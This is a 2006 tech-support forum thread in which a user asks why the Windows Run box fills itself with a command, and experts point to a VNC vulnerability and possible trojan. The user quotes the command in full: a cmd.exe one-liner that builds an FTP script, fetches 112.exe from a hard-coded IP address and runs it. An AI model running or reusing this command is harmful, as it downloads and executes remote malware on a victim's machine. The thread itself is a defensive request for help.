Solved

Run window being auto populated by someone/thing else

Posted on 2006-11-05
4
272 Views
Last Modified: 2013-12-04
Hello

I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something

This is the command line :

cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit

I downloaded these programs against  rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated
0
Comment
Question by:calvinnhobbes
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
4 Comments
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 500 total points
ID: 17877953
0
 
LVL 26

Expert Comment

by:DireOrbAnt
ID: 17878746
Yes, you need to update your VNC. However, you probably have some trojan on your computer already.
So run something like HijackThis:
http://www.spywareinfo.com/~merijn/programs.php#hijackthis

And remove anything suspicious. Do this after upgrading VNC.
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 17899000
What was the solution ultimately to your issue? Did kaspersky detect this, if so, what was the name it came up with? i think this info can help others that are having these issues.
Thanks!
-rich
0
 

Author Comment

by:calvinnhobbes
ID: 17899701
kaspersky didnt find anything, but i have done the upgrade from the free version to the professional version of VNC viewer and the  problem has gone. Hijackthis didnt find anything as well. I'm still afraid that the trojan or whatever is still in my system.
davide
0

Featured Post

Enterprise Mobility and BYOD For Dummies

Like “For Dummies” books, you can read this in whatever order you choose and learn about mobility and BYOD; and how to put a competitive mobile infrastructure in place. Developed for SMBs and large enterprises alike, you will find helpful use cases, planning, and implementation.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Recently, a new law in my state forced us to get a top-to-bottom analysis of all of our contract client's networks. While we have documentation, it was spotty at best for some - and in any event it needed to be checked against reality. That was m…
This is a guide to the following problem (not exclusive but here) on Windows: Users need our support and we supporters often use global administrative accounts to do this. Using these accounts safely is a real challenge. Any admin who takes se…
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …

749 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question